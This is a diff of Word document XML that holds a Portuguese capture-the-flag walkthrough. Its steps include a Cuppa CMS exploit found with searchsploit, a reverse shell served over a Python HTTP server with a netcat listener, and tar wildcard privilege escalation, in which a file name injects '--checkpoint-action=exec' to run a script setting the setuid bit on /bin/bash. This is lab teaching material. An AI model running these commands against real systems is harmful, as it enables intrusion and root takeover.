+        <w:t>Então apenas falta escolher o único acessível e baixa-lo.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4966,45 +3717,8 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>searchsploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Cuppa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> searchsploit Cuppa</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5039,79 +3753,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>searchsploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> –m </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>webapps</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>/25971.txt</w:t>
+        <w:t xml:space="preserve"> searchsploit –m php/webapps/25971.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5256,10 +3898,11 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Lendo um pouco do </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t>Lendo um pouco do exploit, você pode ver como utiliza-lo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="242424"/>
@@ -5268,9 +3911,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>exploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5280,102 +3921,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">, você pode ver como </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>utiliza-lo</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Primeiro é preciso ter uma reverse </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>shell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> baixada e </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>edita-la</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Primeiro é preciso ter uma reverse shell baixada e edita-la </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5455,9 +4001,8 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> usando </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> usando python para poder baixar a shell dentro do servidor alvo.</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5467,10 +4012,11 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>python</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t xml:space="preserve"> (Inicie dentro do diretório aonde esta a reverse shell)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="242424"/>
@@ -5479,9 +4025,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> para poder baixar a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5491,176 +4035,8 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>shell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dentro do servidor alvo.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Inicie dentro do diretório aonde </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>esta</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a reverse </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>shell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Também é necessário criar um </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> para poder ouvir quando a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>shell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> for </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>executada .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Também é necessário criar um netcat para poder ouvir quando a shell for executada . </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5760,33 +4136,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">python3 -m </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>http.server</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 80</w:t>
+        <w:t>python3 -m http.server 80</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5822,79 +4172,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> –</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>lvnp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>port</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
+        <w:t xml:space="preserve"> nc –lvnp &lt;port&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6225,29 +4503,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>/home/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Forte"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>milesdyson</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Forte"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>/backups</w:t>
+        <w:t>/home/milesdyson/backups</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6344,10 +4600,271 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> dentro do diretório /var/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t xml:space="preserve"> dentro do diretório /var/www/html </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-builtin"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Comando usado: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-builtin"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>'#!/bin/bash\nchmod +s /bin/bash'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &gt; privesc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-builtin"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Comando usado: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-builtin"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>echo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>""</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>"-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>-checkpoint-action=exec=sh privesc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
